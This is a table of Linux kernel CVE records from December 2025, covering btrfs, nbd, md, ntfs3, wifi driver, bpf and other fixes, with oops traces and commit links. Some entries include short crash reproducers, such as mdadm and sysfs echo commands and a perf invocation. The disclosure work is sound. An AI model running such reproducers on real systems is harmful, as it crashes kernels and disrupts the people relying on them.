| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix racy bitfield write in btrfs_clear_space_info_full() From the memory-barriers.txt document regarding memory barrier ordering guarantees: (*) These guarantees do not apply to bitfields, because compilers often generate code to modify these using non-atomic read-modify-write sequences. Do not attempt to use bitfields to synchronize parallel algorithms. (*) Even in cases where bitfields are protected by locks, all fields in a given bitfield must be protected by one lock. If two fields in a given bitfield are protected by different locks, the compiler's non-atomic read-modify-write sequences can cause an update to one field to corrupt the value of an adjacent field. btrfs_space_info has a bitfield sharing an underlying word consisting of the fields full, chunk_alloc, and flush: struct btrfs_space_info { struct btrfs_fs_info * fs_info; /* 0 8 */ struct btrfs_space_info * parent; /* 8 8 */ ... int clamp; /* 172 4 */ unsigned int full:1; /* 176: 0 4 */ unsigned int chunk_alloc:1; /* 176: 1 4 */ unsigned int flush:1; /* 176: 2 4 */ ... Therefore, to be safe from parallel read-modify-writes losing a write to one of the bitfield members protected by a lock, all writes to all the bitfields must use the lock. They almost universally do, except for btrfs_clear_space_info_full() which iterates over the space_infos and writes out found->full = 0 without a lock. Imagine that we have one thread completing a transaction in which we finished deleting a block_group and are thus calling btrfs_clear_space_info_full() while simultaneously the data reclaim ticket infrastructure is running do_async_reclaim_data_space(): T1 T2 btrfs_commit_transaction btrfs_clear_space_info_full data_sinfo->full = 0 READ: full:0, chunk_alloc:0, flush:1 do_async_reclaim_data_space(data_sinfo) spin_lock(&space_info->lock); if(list_empty(tickets)) space_info->flush = 0; READ: full: 0, chunk_alloc:0, flush:1 MOD/WRITE: full: 0, chunk_alloc:0, flush:0 spin_unlock(&space_info->lock); return; MOD/WRITE: full:0, chunk_alloc:0, flush:1 and now data_sinfo->flush is 1 but the reclaim worker has exited. This breaks the invariant that flush is 0 iff there is no work queued or running. Once this invariant is violated, future allocations that go into __reserve_bytes() will add tickets to space_info->tickets but will see space_info->flush is set to 1 and not queue the work. After this, they will block forever on the resulting ticket, as it is now impossible to kick the worker again. I also confirmed by looking at the assembly of the affected kernel that it is doing RMW operations. For example, to set the flush (3rd) bit to 0, the assembly is: andb $0xfb,0x60(%rbx) and similarly for setting the full (1st) bit to 0: andb $0xfe,-0x20(%rax) So I think this is really a bug on practical systems. I have observed a number of systems in this exact state, but am currently unable to reproduce it. Rather than leaving this footgun lying around for the future, take advantage of the fact that there is room in the struct anyway, and that it is already quite large and simply change the three bitfield members to bools. This avoids writes to space_info->full having any effect on ---truncated--- | 2025-12-24 | not yet calculated | CVE-2025-68358 | https://git.kernel.org/stable/c/6f442808a86eef847ee10afa9e6459494ed85bb3 https://git.kernel.org/stable/c/742b90eaf394f0018352c0e10dc89763b2dd5267 https://git.kernel.org/stable/c/38e818718c5e04961eea0fa8feff3f100ce40408 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix double free of qgroup record after failure to add delayed ref head In the previous code it was possible to incur into a double kfree() scenario when calling add_delayed_ref_head(). This could happen if the record was reported to already exist in the btrfs_qgroup_trace_extent_nolock() call, but then there was an error later on add_delayed_ref_head(). In this case, since add_delayed_ref_head() returned an error, the caller went to free the record. Since add_delayed_ref_head() couldn't set this kfree'd pointer to NULL, then kfree() would have acted on a non-NULL 'record' object which was pointing to memory already freed by the callee. The problem comes from the fact that the responsibility to kfree the object is on both the caller and the callee at the same time. Hence, the fix for this is to shift the ownership of the 'qrecord' object out of the add_delayed_ref_head(). That is, we will never attempt to kfree() the given object inside of this function, and will expect the caller to act on the 'qrecord' object on its own. The only exception where the 'qrecord' object cannot be kfree'd is if it was inserted into the tracing logic, for which we already have the 'qrecord_inserted_ret' boolean to account for this. Hence, the caller has to kfree the object only if add_delayed_ref_head() reports not to have inserted it on the tracing logic. As a side-effect of the above, we must guarantee that 'qrecord_inserted_ret' is properly initialized at the start of the function, not at the end, and then set when an actual insert happens. This way we avoid 'qrecord_inserted_ret' having an invalid value on an early exit. The documentation from the add_delayed_ref_head() has also been updated to reflect on the exact ownership of the 'qrecord' object. | 2025-12-24 | not yet calculated | CVE-2025-68359 | https://git.kernel.org/stable/c/7617680769e3119dfb3b43a2b7c287ce2242211c https://git.kernel.org/stable/c/364685c4c2d9c9f4408d95451bcf42fdeebc3ebb https://git.kernel.org/stable/c/725e46298876a2cc1f1c3fb22ba69d29102c3ddf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: wed: use proper wed reference in mt76 wed driver callbacks MT7996 driver can use both wed and wed_hif2 devices to offload traffic from/to the wireless NIC. In the current codebase we assume to always use the primary wed device in wed callbacks resulting in the following crash if the hw runs wed_hif2 (e.g. 6GHz link). [ 297.455876] Unable to handle kernel read from unreadable memory at virtual address 000000000000080a [ 297.464928] Mem abort info: [ 297.467722] ESR = 0x0000000096000005 [ 297.471461] EC = 0x25: DABT (current EL), IL = 32 bits [ 297.476766] SET = 0, FnV = 0 [ 297.479809] EA = 0, S1PTW = 0 [ 297.482940] FSC = 0x05: level 1 translation fault [ 297.487809] Data abort info: [ 297.490679] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000 [ 297.496156] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 297.501196] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 297.506500] user pgtable: 4k pages, 39-bit VAs, pgdp=0000000107480000 [ 297.512927] [000000000000080a] pgd=08000001097fb003, p4d=08000001097fb003, pud=08000001097fb003, pmd=0000000000000000 [ 297.523532] Internal error: Oops: 0000000096000005 [#1] SMP [ 297.715393] CPU: 2 UID: 0 PID: 45 Comm: kworker/u16:2 Tainted: G O 6.12.50 #0 [ 297.723908] Tainted: [O]=OOT_MODULE [ 297.727384] Hardware name: Banana Pi BPI-R4 (2x SFP+) (DT) [ 297.732857] Workqueue: nf_ft_offload_del nf_flow_rule_route_ipv6 [nf_flow_table] [ 297.740254] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 297.747205] pc : mt76_wed_offload_disable+0x64/0xa0 [mt76] [ 297.752688] lr : mtk_wed_flow_remove+0x58/0x80 [ 297.757126] sp : ffffffc080fe3ae0 [ 297.760430] x29: ffffffc080fe3ae0 x28: ffffffc080fe3be0 x27: 00000000deadbef7 [ 297.767557] x26: ffffff80c5ebca00 x25: 0000000000000001 x24: ffffff80c85f4c00 [ 297.774683] x23: ffffff80c1875b78 x22: ffffffc080d42cd0 x21: ffffffc080660018 [ 297.781809] x20: ffffff80c6a076d0 x19: ffffff80c6a043c8 x18: 0000000000000000 [ 297.788935] x17: 0000000000000000 x16: 0000000000000001 x15: 0000000000000000 [ 297.796060] x14: 0000000000000019 x13: ffffff80c0ad8ec0 x12: 00000000fa83b2da [ 297.803185] x11: ffffff80c02700c0 x10: ffffff80c0ad8ec0 x9 : ffffff81fef96200 [ 297.810311] x8 : ffffff80c02700c0 x7 : ffffff80c02700d0 x6 : 0000000000000002 [ 297.817435] x5 : 0000000000000400 x4 : 0000000000000000 x3 : 0000000000000000 [ 297.824561] x2 : 0000000000000001 x1 : 0000000000000800 x0 : ffffff80c6a063c8 [ 297.831686] Call trace: [ 297.834123] mt76_wed_offload_disable+0x64/0xa0 [mt76] [ 297.839254] mtk_wed_flow_remove+0x58/0x80 [ 297.843342] mtk_flow_offload_cmd+0x434/0x574 [ 297.847689] mtk_wed_setup_tc_block_cb+0x30/0x40 [ 297.852295] nf_flow_offload_ipv6_hook+0x7f4/0x964 [nf_flow_table] [ 297.858466] nf_flow_rule_route_ipv6+0x438/0x4a4 [nf_flow_table] [ 297.864463] process_one_work+0x174/0x300 [ 297.868465] worker_thread+0x278/0x430 [ 297.872204] kthread+0xd8/0xdc [ 297.875251] ret_from_fork+0x10/0x20 [ 297.878820] Code: 928b5ae0 8b000273 91400a60 f943fa61 (79401421) [ 297.884901] ---[ end trace 0000000000000000 ]--- Fix the issue by detecting the proper wed reference to use when running wed callbacks. | 2025-12-24 | not yet calculated | CVE-2025-68360 | https://git.kernel.org/stable/c/ab94ecb997fd1bbc501a0116c7aad51556b67c86 https://git.kernel.org/stable/c/d582d0e988d696698c94edf097062bb987ae592c https://git.kernel.org/stable/c/385aab8fccd7a8746b9f1a17f3c1e38498a14bc7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: limit the level of fs stacking for file-backed mounts Otherwise, it could cause potential kernel stack overflow (e.g., EROFS mounting itself). | 2025-12-24 | not yet calculated | CVE-2025-68361 | https://git.kernel.org/stable/c/34447aeedbaea8f9aad3da5b07030a1c0e124639 https://git.kernel.org/stable/c/b4911825348a494e894e6ccfcf88d99e9425f129 https://git.kernel.org/stable/c/620472e6b303c4dbcc7ecf1aba1cda4f3523e4a4 https://git.kernel.org/stable/c/d53cd891f0e4311889349fff3a784dc552f814b9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtl818x: rtl8187: Fix potential buffer underflow in rtl8187_rx_cb() The rtl8187_rx_cb() calculates the rx descriptor header address by subtracting its size from the skb tail pointer. However, it does not validate if the received packet (skb->len from urb->actual_length) is large enough to contain this header. If a truncated packet is received, this will lead to a buffer underflow, reading memory before the start of the skb data area, and causing a kernel panic. Add length checks for both rtl8187 and rtl8187b descriptor headers before attempting to access them, dropping the packet cleanly if the check fails. | 2025-12-24 | not yet calculated | CVE-2025-68362 | https://git.kernel.org/stable/c/4758770a673c60d8f615809304d72e1432fa6355 https://git.kernel.org/stable/c/638d4148e166d114a4cd7becaae992ce1a815ed8 https://git.kernel.org/stable/c/5ebf0fe7eaef9f6173a4c6ea77c5353e21645d15 https://git.kernel.org/stable/c/b647d2574e4583c2e3b0ab35568f60c88e910840 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Check skb->transport_header is set in bpf_skb_check_mtu The bpf_skb_check_mtu helper needs to use skb->transport_header when the BPF_MTU_CHK_SEGS flag is used: bpf_skb_check_mtu(skb, ifindex, &mtu_len, 0, BPF_MTU_CHK_SEGS) The transport_header is not always set. There is a WARN_ON_ONCE report when CONFIG_DEBUG_NET is enabled + skb->gso_size is set + bpf_prog_test_run is used: WARNING: CPU: 1 PID: 2216 at ./include/linux/skbuff.h:3071 skb_gso_validate_network_len bpf_skb_check_mtu bpf_prog_3920e25740a41171_tc_chk_segs_flag # A test in the next patch bpf_test_run bpf_prog_test_run_skb For a normal ingress skb (not test_run), skb_reset_transport_header is performed but there is plan to avoid setting it as described in commit 2170a1f09148 ("net: no longer reset transport_header in __netif_receive_skb_core()"). This patch fixes the bpf helper by checking skb_transport_header_was_set(). The check is done just before skb->transport_header is used, to avoid breaking the existing bpf prog. The WARN_ON_ONCE is limited to bpf_prog_test_run, so targeting bpf-next. | 2025-12-24 | not yet calculated | CVE-2025-68363 | https://git.kernel.org/stable/c/30ce906557a21adef4cba5901c8e995dc18263a9 https://git.kernel.org/stable/c/1c30e4afc5507f0069cc09bd561e510e4d97fbf7 https://git.kernel.org/stable/c/942268e2726ac7f16e3ec49dbfbbbe7cf5af9da5 https://git.kernel.org/stable/c/d946f3c98328171fa50ddb908593cf833587f725 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: relax BUG() to ocfs2_error() in __ocfs2_move_extent() In '__ocfs2_move_extent()', relax 'BUG()' to 'ocfs2_error()' just to avoid crashing the whole kernel due to a filesystem corruption. | 2025-12-24 | not yet calculated | CVE-2025-68364 | https://git.kernel.org/stable/c/e5c2503696ec2e0dc7b2aee902dc859ccde39ddf https://git.kernel.org/stable/c/7abbe41d22a06aae00fd46d29f59dd40a01e988f https://git.kernel.org/stable/c/e5c52c320577cd405b251943ef77842dc6f303bf https://git.kernel.org/stable/c/8a7d58845fae061c62b50bc5eeb9bae4a1dedc3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Initialize allocated memory before use KMSAN reports: Multiple uninitialized values detected: - KMSAN: uninit-value in ntfs_read_hdr (3) - KMSAN: uninit-value in bcmp (3) Memory is allocated by __getname(), which is a wrapper for kmem_cache_alloc(). This memory is used before being properly cleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to properly allocate and clear memory before use. | 2025-12-24 | not yet calculated | CVE-2025-68365 | https://git.kernel.org/stable/c/192e8ce302f14ac66259231dd10cede19858d742 https://git.kernel.org/stable/c/a8a3ca23bbd9d849308a7921a049330dc6c91398 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nbd: defer config unlock in nbd_genl_connect There is one use-after-free warning when running NBD_CMD_CONNECT and NBD_CLEAR_SOCK: nbd_genl_connect nbd_alloc_and_init_config // config_refs=1 nbd_start_device // config_refs=2 set NBD_RT_HAS_CONFIG_REF open nbd // config_refs=3 recv_work done // config_refs=2 NBD_CLEAR_SOCK // config_refs=1 close nbd // config_refs=0 refcount_inc -> uaf ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290 nbd_genl_connect+0x16d0/0x1ab0 genl_family_rcv_msg_doit+0x1f3/0x310 genl_rcv_msg+0x44a/0x790 The issue can be easily reproduced by adding a small delay before refcount_inc(&nbd->config_refs) in nbd_genl_connect(): mutex_unlock(&nbd->config_lock); if (!ret) { set_bit(NBD_RT_HAS_CONFIG_REF, &config->runtime_flags); + printk("before sleep\n"); + mdelay(5 * 1000); + printk("after sleep\n"); refcount_inc(&nbd->config_refs); nbd_connect_reply(info, nbd->index); } | 2025-12-24 | not yet calculated | CVE-2025-68366 | https://git.kernel.org/stable/c/c9b99c948b4fb014812afe7b5ccf2db121d22e46 https://git.kernel.org/stable/c/9a38306643874566d20f7aba7dff9e6f657b51a9 https://git.kernel.org/stable/c/c9e805f6a35d1dd189a9345595a5c20e87611942 https://git.kernel.org/stable/c/1649714b930f9ea6233ce0810ba885999da3b5d4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse The following warning appears when running syzkaller, and this issue also exists in the mainline code. ------------[ cut here ]------------ list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100. WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130 Modules linked in: CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:__list_add_valid_or_report+0xf7/0x130 RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282 RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817 RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001 RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100 R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48 FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 80000000 Call Trace: <TASK> input_register_handler+0xb3/0x210 mac_hid_start_emulation+0x1c5/0x290 mac_hid_toggle_emumouse+0x20a/0x240 proc_sys_call_handler+0x4c2/0x6e0 new_sync_write+0x1b1/0x2d0 vfs_write+0x709/0x950 ksys_write+0x12a/0x250 do_syscall_64+0x5a/0x110 entry_SYSCALL_64_after_hwframe+0x78/0xe2 The WARNING occurs when two processes concurrently write to the mac-hid emulation sysctl, causing a race condition in mac_hid_toggle_emumouse(). Both processes read old_val=0, then both try to register the input handler, leading to a double list_add of the same handler. CPU0 CPU1 ------------------------- ------------------------- vfs_write() //write 1 vfs_write() //write 1 proc_sys_write() proc_sys_write() mac_hid_toggle_emumouse() mac_hid_toggle_emumouse() old_val = *valp // old_val=0 old_val = *valp // old_val=0 mutex_lock_killable() proc_dointvec() // *valp=1 mac_hid_start_emulation() input_register_handler() mutex_unlock() mutex_lock_killable() proc_dointvec() mac_hid_start_emulation() input_register_handler() //Trigger Warning mutex_unlock() Fix this by moving the old_val read inside the mutex lock region. | 2025-12-24 | not yet calculated | CVE-2025-68367 | https://git.kernel.org/stable/c/230621ffdb361d15cd3ef92d8b4fa8d314f4fad4 https://git.kernel.org/stable/c/388391dd1cc567fcf0b372b63d414c119d23e911 https://git.kernel.org/stable/c/48a7d427eb65922b3f17fbe00e2bbc7cb9eac381 https://git.kernel.org/stable/c/1e4b207ffe54cf33a4b7a2912c4110f89c73bf3f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md: init bioset in mddev_init IO operations may be needed before md_run(), such as updating metadata after writing sysfs. Without bioset, this triggers a NULL pointer dereference as below: BUG: kernel NULL pointer dereference, address: 0000000000000020 Call Trace: md_update_sb+0x658/0xe00 new_level_store+0xc5/0x120 md_attr_store+0xc9/0x1e0 sysfs_kf_write+0x6f/0xa0 kernfs_fop_write_iter+0x141/0x2a0 vfs_write+0x1fc/0x5a0 ksys_write+0x79/0x180 __x64_sys_write+0x1d/0x30 x64_sys_call+0x2818/0x2880 do_syscall_64+0xa9/0x580 entry_SYSCALL_64_after_hwframe+0x4b/0x53 Reproducer ``` mdadm -CR /dev/md0 -l1 -n2 /dev/sd[cd] echo inactive > /sys/block/md0/md/array_state echo 10 > /sys/block/md0/md/new_level ``` mddev_init() can only be called once per mddev, no need to test if bioset has been initialized anymore. | 2025-12-24 | not yet calculated | CVE-2025-68368 | https://git.kernel.org/stable/c/9d37fe37dfa0833a8768740f0575e0ffd793cb4a https://git.kernel.org/stable/c/381a3ce1c0ffed647c9b913e142b099c7e9d5afc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: init run lock for extend inode After setting the inode mode of $Extend to a regular file, executing the truncate system call will enter the do_truncate() routine, causing the run_lock uninitialized error reported by syzbot. Prior to patch 4e8011ffec79, if the inode mode of $Extend was not set to a regular file, the do_truncate() routine would not be entered. Add the run_lock initialization when loading $Extend. syzbot reported: INFO: trying to register non-static key. Call Trace: dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 assign_lock_key+0x133/0x150 kernel/locking/lockdep.c:984 register_lock_class+0x105/0x320 kernel/locking/lockdep.c:1299 __lock_acquire+0x99/0xd20 kernel/locking/lockdep.c:5112 lock_acquire+0x120/0x360 kernel/locking/lockdep.c:5868 down_write+0x96/0x1f0 kernel/locking/rwsem.c:1590 ntfs_set_size+0x140/0x200 fs/ntfs3/inode.c:860 ntfs_extend+0x1d9/0x970 fs/ntfs3/file.c:387 ntfs_setattr+0x2e8/0xbe0 fs/ntfs3/file.c:808 | 2025-12-24 | not yet calculated | CVE-2025-68369 | https://git.kernel.org/stable/c/6e17555728bc469d484c59db4a0abc65c19bc315 https://git.kernel.org/stable/c/19164d8228317f3f1fe2662a9ba587cfe3b2d29e https://git.kernel.org/stable/c/ab5e8ebeee1caa4fcf8be7d8d62c0a7165469076 https://git.kernel.org/stable/c/be99c62ac7e7af514e4b13f83c891a3cccefaa48 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: coresight: tmc: add the handle of the event to the path The handle is essential for retrieving the AUX_EVENT of each CPU and is required in perf mode. It has been added to the coresight_path so that dependent devices can access it from the path when needed. The existing bug can be reproduced with: perf record -e cs_etm//k -C 0-9 dd if=/dev/zero of=/dev/null Showing an oops as follows: Unable to handle kernel paging request at virtual address 000f6e84934ed19e Call trace: tmc_etr_get_buffer+0x30/0x80 [coresight_tmc] (P) catu_enable_hw+0xbc/0x3d0 [coresight_catu] catu_enable+0x70/0xe0 [coresight_catu] coresight_enable_path+0xb0/0x258 [coresight] | 2025-12-24 | not yet calculated | CVE-2025-68370 | https://git.kernel.org/stable/c/faa8f38f7ccb344ace2c1f364efc70e3a12d32f3 https://git.kernel.org/stable/c/d0c9effd82f2c19b92acd07d357fac5f392d549a https://git.kernel.org/stable/c/aaa5abcc9d44d2c8484f779ab46d242d774cabcb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: smartpqi: Fix device resources accessed after device removal Correct possible race conditions during device removal. Previously, a scheduled work item to reset a LUN could still execute after the device was removed, leading to use-after-free and other resource access issues. This race condition occurs because the abort handler may schedule a LUN reset concurrently with device removal via sdev_destroy(), leading to use-after-free and improper access to freed resources. - Check in the device reset handler if the device is still present in the controller's SCSI device list before running; if not, the reset is skipped. - Cancel any pending TMF work that has not started in sdev_destroy(). - Ensure device freeing in sdev_destroy() is done while holding the LUN reset mutex to avoid races with ongoing resets. | 2025-12-24 | not yet calculated | CVE-2025-68371 | https://git.kernel.org/stable/c/eccc02ba1747501d92bb2049e3ce378ba372f641 https://git.kernel.org/stable/c/4e1acf1b6dd6dd0495bda139daafd7a403ae2dc1 https://git.kernel.org/stable/c/1a5c5a2f88e839af5320216a02ffb075b668596a https://git.kernel.org/stable/c/b518e86d1a70a88f6592a7c396cf1b93493d1aab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nbd: defer config put in recv_work There is one uaf issue in recv_work when running NBD_CLEAR_SOCK and NBD_CMD_RECONFIGURE: nbd_genl_connect // conf_ref=2 (connect and recv_work A) nbd_open // conf_ref=3 recv_work A done // conf_ref=2 NBD_CLEAR_SOCK // conf_ref=1 nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B) close nbd // conf_ref=1 recv_work B config_put // conf_ref=0 atomic_dec(&config->recv_threads); -> UAF Or only running NBD_CLEAR_SOCK: nbd_genl_connect // conf_ref=2 nbd_open // conf_ref=3 NBD_CLEAR_SOCK // conf_ref=2 close nbd nbd_release config_put // conf_ref=1 recv_work config_put // conf_ref=0 atomic_dec(&config->recv_threads); -> UAF Commit 87aac3a80af5 ("nbd: call nbd_config_put() before notifying the waiter") moved nbd_config_put() to run before waking up the waiter in recv_work, in order to ensure that nbd_start_device_ioctl() would not be woken up while nbd->task_recv was still uncleared. However, in nbd_start_device_ioctl(), after being woken up it explicitly calls flush_workqueue() to make sure all current works are finished. Therefore, there is no need to move the config put ahead of the wakeup. Move nbd_config_put() to the end of recv_work, so that the reference is held for the whole lifetime of the worker thread. This makes sure the config cannot be freed while recv_work is still running, even if clear + reconfigure interleave. In addition, we don't need to worry about recv_work dropping the last nbd_put (which causes deadlock): path A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT): connect // nbd_refs=1 (trigger recv_work) open nbd // nbd_refs=2 NBD_CLEAR_SOCK close nbd nbd_release nbd_disconnect_and_put flush_workqueue // recv_work done nbd_config_put nbd_put // nbd_refs=1 nbd_put // nbd_refs=0 queue_work path B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT): connect // nbd_refs=2 (trigger recv_work) open nbd // nbd_refs=3 NBD_CLEAR_SOCK // conf_refs=2 close nbd nbd_release nbd_config_put // conf_refs=1 nbd_put // nbd_refs=2 recv_work done // conf_refs=0, nbd_refs=1 rmmod // nbd_refs=0 Depends-on: e2daec488c57 ("nbd: Fix hungtask when nbd_config_put") | 2025-12-24 | not yet calculated | CVE-2025-68372 | https://git.kernel.org/stable/c/6b69593f72e1bfba6ca47ca8d9b619341fded7d6 https://git.kernel.org/stable/c/443a1721806b6ff6303b5229e9811d68172d622f https://git.kernel.org/stable/c/742012f6bf29553fdc460bf646a58df3a7b43d01 https://git.kernel.org/stable/c/9517b82d8d422d426a988b213fdd45c6b417b86d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md: avoid repeated calls to del_gendisk There is a uaf problem which is found by case 23rdev-lifetime: Oops: general protection fault, probably for non-canonical address 0xdead000000000122 RIP: 0010:bdi_unregister+0x4b/0x170 Call Trace: <TASK> __del_gendisk+0x356/0x3e0 mddev_unlock+0x351/0x360 rdev_attr_store+0x217/0x280 kernfs_fop_write_iter+0x14a/0x210 vfs_write+0x29e/0x550 ksys_write+0x74/0xf0 do_syscall_64+0xbb/0x380 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7ff5250a177e The sequence is: 1. rdev remove path gets reconfig_mutex 2. rdev remove path release reconfig_mutex in mddev_unlock 3. md stop calls do_md_stop and sets MD_DELETED 4. rdev remove path calls del_gendisk because MD_DELETED is set 5. md stop path release reconfig_mutex and calls del_gendisk again So there is a race condition we should resolve. This patch adds a flag MD_DO_DELETE to avoid the race condition. | 2025-12-24 | not yet calculated | CVE-2025-68373 | https://git.kernel.org/stable/c/b4c5cf406062ad44cd178269571530c6435b2f3b https://git.kernel.org/stable/c/f0fae1debeb9102398ddf2ef69b4f5d395afafed https://git.kernel.org/stable/c/90e3bb44c0a86e245d8e5c6520206fa113acb1ee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md: fix rcu protection in md_wakeup_thread We attempted to use RCU to protect the pointer 'thread', but directly passed the value when calling md_wakeup_thread(). This means that the RCU pointer has been acquired before rcu_read_lock(), which renders rcu_read_lock() ineffective and could lead to a use-after-free. | 2025-12-24 | not yet calculated | CVE-2025-68374 | https://git.kernel.org/stable/c/21989cb5034c835b212385a2afadf279d8069da0 https://git.kernel.org/stable/c/a4bd1caf591faeae44cb10b6517e7dacb5139bda https://git.kernel.org/stable/c/f98b191f78124405294481dea85f8a22a3eb0a59 https://git.kernel.org/stable/c/0dc76205549b4c25705e54345f211b9f66e018a0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86: Fix NULL event access and potential PEBS record loss When intel_pmu_drain_pebs_icl() is called to drain PEBS records, perf_event_overflow() could be called to process the last PEBS record. perf_event_overflow() could in turn trigger the interrupt throttle and stop all events of the group, as the call chain below shows. perf_event_overflow() -> __perf_event_overflow() ->__perf_event_account_interrupt() -> perf_event_throttle_group() -> perf_event_throttle() -> event->pmu->stop() -> x86_pmu_stop() The side effect of stopping the events is that all corresponding event pointers in the cpuc->events[] array are cleared to NULL. Assume there are two PEBS events (event a and event b) in a group. When intel_pmu_drain_pebs_icl() calls perf_event_overflow() to process the last PEBS record of PEBS event a, interrupt throttle is triggered and all pointers of event a and event b are cleared to NULL. Then intel_pmu_drain_pebs_icl() tries to process the last PEBS record of event b and encounters a NULL pointer access. To avoid this issue, move the cpuc->events[] clearing from x86_pmu_stop() to x86_pmu_del(). This is safe since cpuc->active_mask or cpuc->pebs_enabled is always checked before accessing the event pointer from cpuc->events[]. | 2025-12-24 | not yet calculated | CVE-2025-68375 | https://git.kernel.org/stable/c/cf69b99805c263117305ac6dffbc85aaf9259d32 https://git.kernel.org/stable/c/6b089028bff1f2ff9e0c62b8f1faca1a620e5d6e https://git.kernel.org/stable/c/7e772a93eb61cb6265bdd1c5bde17d0f2718b452 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: coresight: ETR: Fix ETR buffer use-after-free issue When ETR is enabled as CS_MODE_SYSFS, if the buffer size is changed and enabled again, currently sysfs_buf will point to the newly allocated memory(buf_new) and free the old memory(buf_old). But the etr_buf that is being used by the ETR remains pointed to buf_old, not updated to buf_new. In this case, it will result in a memory use-after-free issue. Fix this by checking ETR's mode before updating and releasing buf_old, if the mode is CS_MODE_SYSFS, then skip updating and releasing it. | 2025-12-24 | not yet calculated | CVE-2025-68376 | https://git.kernel.org/stable/c/70acbc9c77686b7a521af6d7a543dcd9c324cf07 https://git.kernel.org/stable/c/cda077a19f5c8d6ec61e5b97deca203d95e3a422 https://git.kernel.org/stable/c/35501ac3c7d40a7bb9568c2f89d6b56beaf9bed3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ns: initialize ns_list_node for initial namespaces Make sure that the list is always initialized for initial namespaces. | 2025-12-24 | not yet calculated | CVE-2025-68377 | https://git.kernel.org/stable/c/e31c902d785411eb4a246fba2e8a32aa59d33ce2 https://git.kernel.org/stable/c/3dd50c58664e2684bd610a57bf3ab713cbb0ea91 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix stackmap overflow check in __bpf_get_stackid() Syzkaller reported a KASAN slab-out-of-bounds write in __bpf_get_stackid() when copying stack trace data. The issue occurs when the perf trace contains more stack entries than the stack map bucket can hold, leading to an out-of-bounds write in the bucket's data array. | 2025-12-24 | not yet calculated | CVE-2025-68378 | https://git.kernel.org/stable/c/d1f424a77b6bd27b361737ed73df49a0158f1590 https://git.kernel.org/stable/c/2a008f6de163279deffd488c1deab081bce5667c https://git.kernel.org/stable/c/4669a8db976c8cbd5427fe9945f12c5fa5168ff3 https://git.kernel.org/stable/c/23f852daa4bab4d579110e034e4d513f7d490846 |
